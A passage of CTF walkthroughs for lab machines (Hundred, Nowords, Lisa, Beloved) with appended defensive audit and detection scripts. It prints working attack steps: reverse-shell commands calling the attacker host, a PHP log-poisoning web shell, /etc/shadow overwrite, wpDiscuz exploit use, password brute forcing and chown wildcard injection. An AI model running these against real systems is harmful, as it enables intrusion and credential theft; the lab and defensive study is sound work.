PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxrwxrwx    1 0        0             435 Aug 02 06:19 id_rsa [NSE: writeable]
| -rwxrwxrwx    1 1000     1000         1679 Aug 02 06:11 id_rsa.pem [NSE: writeable]
| -rwxrwxrwx    1 1000     1000          451 Aug 02 06:11 id_rsa.pub [NSE: writeable]
|_-rwxrwxrwx    1 0        0             187 Aug 02 06:27 users.txt [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)
|   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)
|_  256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Log in to FTP anonymously, download all four files and check each one.

id_rsa is a fake key, users.txt is a list of names, and id_rsa.pem looks like a valid RSA private key.

Scanning port 80 only finds index.html. Its source contains a hint, key: h4ckb1tu5.enc, and a comment suggesting a hidden directory.

```bash
~ curl http://192.168.56.100/index.html
<style>
.center {
display: block;
margin-left: auto;
margin-right: auto;
key: h4ckb1tu5.enc;
width: 50%;
}
</style>

<img src="logo.jpg" class="center">
<h1>Thank you ALL!</h1>
<h1>100 f*cking VMs!!</h1>

<!-- l4nr3n, nice dir.-->
```


Download h4ckb1tu5.enc; a quick search shows how to decrypt an .enc file with openssl and the RSA key from FTP. The plaintext is the directory name.

```bash
~ openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key.bin
~ cat key.bin
/softyhackb4el7dshelldredd
```

Scan the directory with common.txt and find an id_rsa.

```bash
~ gobuster dir -u http://192.168.56.100/softyhackb4el7dshelldredd -t 50 -w /usr/share/dirb/wordlists/common.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/id_rsa               (Status: 200) [Size: 1876]
/index.html           (Status: 200) [Size: 26]
/index.html           (Status: 200) [Size: 26]
```

Try to log in over SSH with the usernames from users.txt downloaded from FTP; the real username turns out to be hmv, the only one for which the key is accepted and a passphrase is requested. We still need the passphrase of the key file.

```bash
~ ssh noname@192.168.56.100 -i id_rsa
noname@192.168.56.100's password:

~ ssh hmv@192.168.56.100 -i id_rsa
Enter passphrase for key 'id_rsa':
```

The web root also serves logo.jpg; let's see whether something is hidden in it, using users.txt as the passphrase list.

```bash
~ stegseek --crack logo.jpg users.txt
StegSeek version 0.5
Progress: 0.00% (0 bytes)

[i] --> Found passphrase: "cromiphi"
[i] Original filename: "toyou.txt"
[i] Extracting to "logo.jpg.out"

~ cat logo.jpg.out
d4t4s3c#1
```

Now we can log in over SSH as hmv.

```bash
~ ssh hmv@192.168.56.100 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
hmv@hundred:~$ id
uid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

/etc/shadow turns out to be writable.

```bash
hmv@hundred:/$ find / -writable -not -path "/proc*" 2>/dev/null
...
/var/www/html/softyhackb4el7dshelldredd/id_rsa
/etc/shadow
...
```

Create a password hash for "mypass" and overwrite /etc/shadow with a root entry that uses it. Then we can su to root.

```bash
hmv@hundred:/$ openssl passwd mypass
J9ZxI.ncuCgxs
hmv@hundred:/$ echo 'root:J9ZxI.ncuCgxs:18656:0:99999:7:::' > /etc/shadow
hmv@hundred:/$ su root
Password:
root@hundred:/# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hundred
root@hundred:/#
```
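Three of the root steps above come down to one class of misconfiguration: a path that root trusts but an unprivileged user can modify (the stdlib random.py imported by root's cron job on Bunny, the /usr/local/bin entry of sudo's secure_path that add-shell searched on Zen, and /etc/shadow here on Hundred). As an added example (not from the original write-ups), the Python audit below checks all three from a defender's view, reporting any path that is not owned by trusted_uid (root by default) or has its group/other write bits set; SENSITIVE_FILES is an assumed list, and build_demo_tree constructs a sample layout reproducing the three weaknesses so the audit can be run without root.

```python
"""Audit paths that root trusts for write access by other users."""
import os
import stat
import sysconfig
import tempfile

# secure_path from the sudo -l output in the Zen section.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Files that must never be writable by an unprivileged user (assumed list).
SENSITIVE_FILES = ["/etc/shadow", "/etc/passwd", "/etc/sudoers", "/etc/crontab"]


def untrusted_writable(path, trusted_uid=0):
    """Reason string if path can be changed by someone other than trusted_uid, else None."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    if stat.S_ISLNK(st.st_mode):
        return "is a symlink (target may be attacker controlled)"
    if st.st_uid != trusted_uid:
        return f"owned by uid {st.st_uid}, not uid {trusted_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"group/other writable (mode {oct(stat.S_IMODE(st.st_mode))})"
    return None


def audit_path_dirs(path_value, trusted_uid=0):
    """A writable directory on a PATH-style string lets a caller plant awk, cat, rm, ... (Zen)."""
    findings = {}
    for d in path_value.split(":"):
        reason = untrusted_writable(d, trusted_uid) if d else None
        if reason:
            findings[d] = reason
    return findings


def audit_tree(root, trusted_uid=0, suffixes=(".py",)):
    """Writable modules under root get imported by whatever root process uses them (Bunny)."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        targets = [dirpath] + [os.path.join(dirpath, n) for n in filenames if n.endswith(suffixes)]
        for target in targets:
            reason = untrusted_writable(target, trusted_uid)
            if reason:
                findings[target] = reason
    return findings


def audit_sensitive_files(paths=SENSITIVE_FILES, trusted_uid=0):
    """A writable /etc/shadow lets anyone set root's password (Hundred)."""
    findings = {}
    for p in paths:
        reason = untrusted_writable(p, trusted_uid)
        if reason:
            findings[p] = reason
    return findings


def build_demo_tree(base=None):
    """Constructed sample layout reproducing the three weaknesses, owned by the current user."""
    base = base or tempfile.mkdtemp(prefix="pathaudit-")
    lib = os.path.join(base, "usr", "lib", "python3.7")
    usr_local_bin = os.path.join(base, "usr", "local", "bin")
    usr_bin = os.path.join(base, "usr", "bin")
    etc = os.path.join(base, "etc")
    for d in (lib, usr_local_bin, usr_bin, etc):
        os.makedirs(d)
        os.chmod(d, 0o755)
    os.chmod(usr_local_bin, 0o777)  # Zen: hua could create /usr/local/bin/awk
    random_py = os.path.join(lib, "random.py")
    with open(random_py, "w") as f:  # Bunny: random.py was writable by chris
        f.write("# stub module\n")
    os.chmod(random_py, 0o666)
    shadow = os.path.join(etc, "shadow")
    with open(shadow, "w") as f:  # Hundred: /etc/shadow was writable by hmv
        f.write("root:*:0:0:99999:7:::\n")
    os.chmod(shadow, 0o666)
    return {"uid": os.getuid(), "lib": lib, "random_py": random_py, "usr_bin": usr_bin,
            "usr_local_bin": usr_local_bin, "secure_path": usr_local_bin + ":" + usr_bin,
            "shadow": shadow}


if __name__ == "__main__":
    # Real audit from root's point of view; run as root for a complete picture.
    report = {}
    report.update(audit_path_dirs(SECURE_PATH))
    report.update(audit_tree(sysconfig.get_paths()["stdlib"]))
    report.update(audit_sensitive_files())
    for path, reason in sorted(report.items()):
        print(f"[!] {path}: {reason}")
    print(f"{len(report)} finding(s)")
```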

HackMyVm Nowords Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Nowords

Below are the main steps.

Nmap the ports, scan port 80, and find a hint in index.html.

```bash
~ curl http://192.168.56.100/index.html
Hint inside.

<!-- [usernames and passwords are lowercase] -->
```

Download robots.txt; it is actually a PNG file with some strings in it.


OCR the strings online, make a wordlist from them, and scan port 80 again; only one valid file is found. Download it: it is actually a JPG file with more strings.


OCR again, lowercase the first character of each word, and make a wordlist. Then brute-force FTP with it.

```bash
~ hydra -L pass2.txt -P pass2.txt 192.168.56.100 -t 64 ftp -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
[DATA] attacking ftp://192.168.56.100:21/
[21][ftp] host: 192.168.56.100   login: sophie   password: natalia
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28
```

Through FTP we can browse the whole filesystem. In /home/sophie there are command.jpg and log.txt.

In /home/me there is doit.py.

```bash
~ cat doit.py
#!/usr/bin/python3
# coding: utf-8

import pytesseract
import os
try:
    import Image, ImageOps, ImageEnhance, imread
except ImportError:
    from PIL import Image, ImageOps, ImageEnhance

def solve_captcha(path):
    captcha = pytesseract.image_to_string(Image.open(path))
    return captcha

if __name__ == '__main__':
    text = solve_captcha("/home/sophie/command.jpg")
    a = text.split("\n")
    f = open("/home/sophie/log.txt","w")
    f.write(" Executing: "+text)
    f.close()
    os.system(a[0])
```

The script means we need to put a shell command, as text, into command.jpg; a cron job then OCRs the image, logs the text to log.txt and executes its first line with os.system.

We render a reverse shell command into command.jpg and upload it through FTP.


After a minute, we get the reverse shell.

```bash
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49930.
bash: cannot set terminal process group (136083): Inappropriate ioctl for device
bash: no job control in this shell
sophie@nowords:~$
```

The root step uses the Ubuntu Polkit vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit


HackMyVm Lisa Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Lisa

Scan ports.

```bash
~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
|   256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
|_  256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Scanning port 80 finds nothing useful. Checking index.html, notice the hint about the domain name vinci.hmv.

```bash
~ curl http://192.168.56.100/index.html |tail -n 15
          <p>
                Please report bugs specific to modules (such as PHP and others)
                to respective packages, not to the web server itself. contact: vinci.hmv
          </p>
        </div>
```

Add vinci.hmv to /etc/hosts and scan port 80 again; still nothing useful.

Use gobuster to enumerate vhosts, filtering out the default-size responses.

```bash
~ gobuster vhost -u vinci.hmv -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
===============================================================
...
Missed: secret.vinci.hmv (Status: 200) [Size: 80]
===============================================================
2021/07/04 15:35:24 Finished
===============================================================
```

Add secret.vinci.hmv to /etc/hosts and scan for files again; this finds file.php.

 ~ gobuster dir -u http://secret.vinci.hmv -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard -o 80_secret.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /file.php             (Status: 200) [Size: 0]

Use wfuzz to find the parameter name.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000004959:   200        26 L     42 W       1441 Ch     "command"  

This looks like an LFI.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
 ...

See what files we can read.

~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0        
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************      
 ...
 000000188:   200        0 L      1 W        32032 Ch    "/var/log/faillog"
 000000173:   200        1364 L   16410 W    130186 Ch   "/var/log/auth.log"
 000000181:   200        2993 L   17879 W    202004 Ch   "/var/log/dpkg.log"
 000000220:   200        5 L      85 W       74873 Ch    "/var/log/wtmp"
 000000224:   200        0 L      1 W        1152 Ch     "/var/run/utmp"
 000000199:   200        0 L      1 W        292292 Ch   "/var/log/lastlog"

Because auth.log records the username of every SSH login attempt, we use PHP code as the SSH username so that it gets written into the log.

 ~ ssh '<?php system($_GET[c]);?>'@192.168.56.100    
 <?php system($_GET[c]);?>@192.168.56.100's password:
 Permission denied, please try again.                

Now we can run shell commands through the poisoned log.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
 ...
 Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data) from 192.168.56.150 port 33632 ssh2
 ...
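
As an added example, not from the original walkthrough, here is the defender's side of the technique above: detection logic for auth.log poisoning, run over constructed sample log lines in the format shown on this page (log content, hostnames and IPs are constructed, not captured).

```shell
#!/bin/bash
# Added example (not part of the original walkthrough): detect auth.log
# poisoning. sshd writes the attempted username into auth.log verbatim, so a
# PHP tag used as an SSH username lands in the log and runs if the log is
# later included by a vulnerable PHP script. SAMPLE_AUTH_LOG is constructed.

SAMPLE_AUTH_LOG='Jun 20 21:40:02 Lisa sshd[7801]: Failed password for leonardo from 192.168.56.150 port 40122 ssh2
Jun 20 21:41:10 Lisa sshd[7820]: Failed password for invalid user admin from 192.168.56.150 port 40130 ssh2
Jun 20 21:52:11 Lisa sshd[7901]: Invalid user <?php system($_GET[c]);?> from 192.168.56.150 port 33620
Jun 20 21:52:13 Lisa sshd[7901]: Failed password for invalid user <?php system($_GET[c]);?> from 192.168.56.150 port 33620 ssh2
Jun 20 21:55:28 Lisa sshd[7932]: Accepted publickey for leonardo from 192.168.56.1 port 50210 ssh2'

# Count sshd lines that carry web-script markup. The check covers the PHP
# open tag and the "<?=" short echo form. Matching on the raw line is
# deliberate: an injected username may contain spaces, which defeats any
# whitespace-based field parse of the log.
count_poisoned_lines() {
    printf '%s\n' "$1" | grep -c -E 'sshd\[[0-9]+\]: .*(<\?php|<\?=)' || true
}

# Extract the injected usernames (between "user " and " from ") so an
# analyst can see exactly what was written into the log, de-duplicated.
poisoned_usernames() {
    printf '%s\n' "$1" \
      | grep -E '(<\?php|<\?=)' \
      | sed -E 's/.*(invalid|Invalid) user (.*) from [0-9.]+ port .*/\2/' \
      | sort -u
}

# Source addresses of the poisoning attempts, for blocking or correlation
# with the web server's access log.
poisoned_sources() {
    printf '%s\n' "$1" \
      | grep -E '(<\?php|<\?=)' \
      | sed -E 's/.* from ([0-9.]+) port .*/\1/' \
      | sort -u
}
```

The same pattern can be fed from a live file with `count_poisoned_lines "$(cat /var/log/auth.log)"`; a non-zero count on a host that also serves PHP is worth an incident ticket.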

Get a reverse shell.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 =====================================================================
 ~ nc -nlvp 1234                                        
 Ncat: Version 7.91 ( https://nmap.org/ncat )          
 Ncat: Listening on :::1234                            
 Ncat: Listening on 0.0.0.0:1234                        
 Ncat: Connection from 192.168.56.100.                  
 Ncat: Connection from 192.168.56.100:52344.            
 id                                                    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)  

There is only one user leonardo, and /opt/cron.sh belongs to him.

```
www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
find / -user leonardo 2>/dev/null
/home/leonardo
/home/leonardo/.bash_logout
/home/leonardo/.profile
/home/leonardo/.bashrc
/home/leonardo/.local
/home/leonardo/.local/share
/home/leonardo/.selected_editor
/home/leonardo/user.txt
/opt/cron.sh
```

Check the source code of cron.sh. 

```
www-data@Lisa:/opt$ cat cron.sh
cat cron.sh
#!/bin/bash

domain='shelly.lisa.hmv'

function check(){

    # if the attacker-controlled hostname answers a ping, connect back to it
    timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
    if [ "$(echo $?)" == "0" ]; then
        nohup nc -e /bin/sh $domain 65000
        exit 0
    else
        exit 1
    fi

}
```


Since /etc/hosts is world-writable, add the attacker's IP for shelly.lisa.hmv to it.

```
www-data@Lisa:/opt$ ls -la /etc/hosts
ls -la /etc/hosts
-rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts
```


Wait a minute and we get a reverse shell as user leonardo.

```
~ nc -nlvp 65000
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::65000
Ncat: Listening on 0.0.0.0:65000
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49036.
id
uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

Upload id_rsa.pub to /home/leonardo/.ssh/authorized_keys and chmod it 600. Then we get SSH access.

 ~ ssh leonardo@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
 /usr/bin/xauth:  file /home/leonardo/.Xauthority does not exist
 leonardo@Lisa:~$

Check sudo -l.

```
leonardo@Lisa:~$ sudo -l
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
Matching Defaults entries for leonardo on Lisa:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User leonardo may run the following commands on Lisa:
    (root) NOPASSWD: /usr/bin/efax
```

Use efax to read the shadow file.

```
leonardo@Lisa:~$ sudo efax -d /etc/shadow
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 10:17 compiled Dec 15 2016 12:12:26
efax: 10:17 opened /etc/shadow
efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
efax: 10:17 Warning: unexpected response "daemon:*:18791:0:99999:7:::"
efax: 10:17 Warning: unexpected response "bin:*:18791:0:99999:7:::"
...
```


Use john to crack the password hash of root.

```
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveme (root)
1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```


Get root at last.

```
leonardo@Lisa:~$ su root
Contraseña:
root@Lisa:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
Lisa
```

HackMyVm Beloved Walkthrough (chown wildcard injection)

https://hackmyvm.eu/machines/machine.php?vm=Beloved

Scan for open ports.

 ~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-generator: WordPress 5.7.2
 | http-robots.txt: 1 disallowed entry
 |_/wp-admin/
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Beloved – Just another WordPress site
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 runs WordPress. Add beloved to /etc/hosts and scan it for vulnerabilities with wpscan.

 ~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log
 [+] wpdiscuz
  | Location: http://beloved/wp-content/plugins/wpdiscuz/
  | Last Updated: 2021-05-15T13:40:00.000Z
  | Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
  | [!] The version is out of date, the latest version is 7.2.2
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
  |     Fixed in: 7.0.5
  |     References:
  |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
  |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
  |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
  |
  | Version: 7.0.4 (80% confidence)

Search for exploits for wpdiscuz.

 ~ searchsploit wpdiscuz
 ------------------------------------------------------------------------ ---------------------------------
  Exploit Title                                                          |  Path
 ------------------------------------------------------------------------ ---------------------------------
 WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
 WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
 WordPress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
 ------------------------------------------------------------------------ --------------------------------

Run the POC code.

```
~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/

[-] WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox

[+] Response length:[51680] | code:[200]
[!] Got wmuSecurity value: 9c794f21e7
[!] Got wmuSecurity value: 1

[+] Generating random name for Webshell...
[!] Generated webshell name: bhgnpbentfvkgzh

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php";
```


Listen on port 1234 and visit the webshell with a reverse shell command; this gives us a reverse shell.

http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Check sudo -l.

```
www-data@beloved:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on beloved:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on beloved:
    (beloved) NOPASSWD: /usr/local/bin/nokogiri
```

The nokogiri command opens an interactive Ruby shell on a parsed document; the trick is to pass it an extra argument, a file to load (here an empty log file), so that the shell starts.

```
www-data@beloved:/$ touch /tmp/log.txt
touch /tmp/log.txt
www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
Your document is stored in @doc...
Switch to inspect mode.
system 'id'
system 'id'
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
system '/bin/bash'
```

Now we are beloved. Upload id_rsa.pub as authorized_keys to get SSH access.

```
cd .ssh
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-07-02 06:44:36-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
...
chmod 600 authorized_keys
```


SSH login as beloved.

```
~ ssh beloved@192.168.56.100
...
beloved@beloved:~$ id
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
```


Run pspy64 to watch for cron jobs.

```
2021/07/02 06:47:01 CMD: UID=0 PID=1878 | /usr/sbin/CRON -f
2021/07/02 06:47:01 CMD: UID=0 PID=1879 | /bin/sh -c cd /opt && chown root:root *
```


In /opt there is only an id_rsa; it may be the private key of user root. We need to make it readable by user beloved.

```
beloved@beloved:/$ ls -la opt
total 12
drwxrwx---  2 root    beloved 4096 Jul  2 06:52 .
drwxr-xr-x 18 root    root    4096 May 19 10:09 ..
-rw-------  1 root    root    1823 Jun 27 16:41 id_rsa
```

Use the chown wildcard vulnerability. See the article here.

```
beloved@beloved:/opt$ touch ref
beloved@beloved:/opt$ touch -- --reference=ref
```

Wait a minute; the id_rsa now belongs to user beloved, the owner of the file ref.

```
beloved@beloved:/opt$ ls -la
total 12
drwxrwx--- 2 root beloved 4096 Jul 2 06:59 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
-rw------- 1 beloved beloved 1823 Jun 27 16:41 id_rsa
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:58 ref
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:59 '--reference=ref'
```

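As an added example (not the walkthrough's own code), the script below reproduces the wildcard injection behind `cd /opt && chown root:root *` without root, using chmod in a temporary directory because changing a file's owner needs privileges while the option parsing is identical, and shows the hardened form of the cron command; the directory layout and file names are constructed for the demo.

```shell
#!/bin/bash
# Added example, not from the original walkthrough: reproduces the wildcard
# injection behind the cron line "cd /opt && chown root:root *" as an
# unprivileged, self-contained demo and shows the hardened command. chmod
# stands in for chown because a normal user may change the mode of its own
# files but not their owner; both coreutils parse an expanded
# "--reference=FILE" name as an option in exactly the same way.

# Build a scratch directory modelled on /opt: a restricted target file
# (like id_rsa, mode 0600) plus the two attacker-created names from the page.
setup_dir() {
    local d
    d=$(mktemp -d)
    (
        cd "$d" || exit 1
        touch secret && chmod 600 secret      # the file that must stay private
        touch ref && chmod 644 ref            # reference file with a looser mode
        touch -- --reference=ref              # filename that looks like an option
    )
    printf '%s' "$d"
}

# Vulnerable pattern: an unquoted glob. The shell expands it to
#   chmod 600 --reference=ref ref secret
# chmod takes --reference=ref as an option, treats "600" as a (missing)
# filename, and copies ref's mode onto every remaining file.
vulnerable_mode() {
    local d
    d=$(setup_dir)
    (cd "$d" && chmod 600 * 2>/dev/null) || true
    stat -c '%a' "$d/secret"          # 644: secret now carries ref's mode
}

# Hardened pattern: "./*" makes every expanded name start with "./", so
# "./--reference=ref" can only be a filename. "chmod 600 -- *" (an explicit
# end-of-options marker) protects the same way; for the cron job on the page
# that means "cd /opt && chown root:root -- *" or "chown root:root ./*".
hardened_mode() {
    local d
    d=$(setup_dir)
    (cd "$d" && chmod 600 ./* 2>/dev/null) || true
    stat -c '%a' "$d/secret"          # 600: unchanged
}

# Defender check: count entries in a directory whose names begin with "-",
# which is what a wildcard injection leaves behind (here: --reference=ref).
count_option_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' | wc -l | tr -d ' '
}
```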

Read id_rsa and use it to log in over SSH as root.

```
~ ssh root@192.168.56.100 -i key ...
root@beloved:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
beloved
```

Vulnhub HackathonCTF: 2 Walkthrough

https://www.vulnhub.com/entry/hackathonctf-2,714/

Difficulty: Easy

Scan ports.

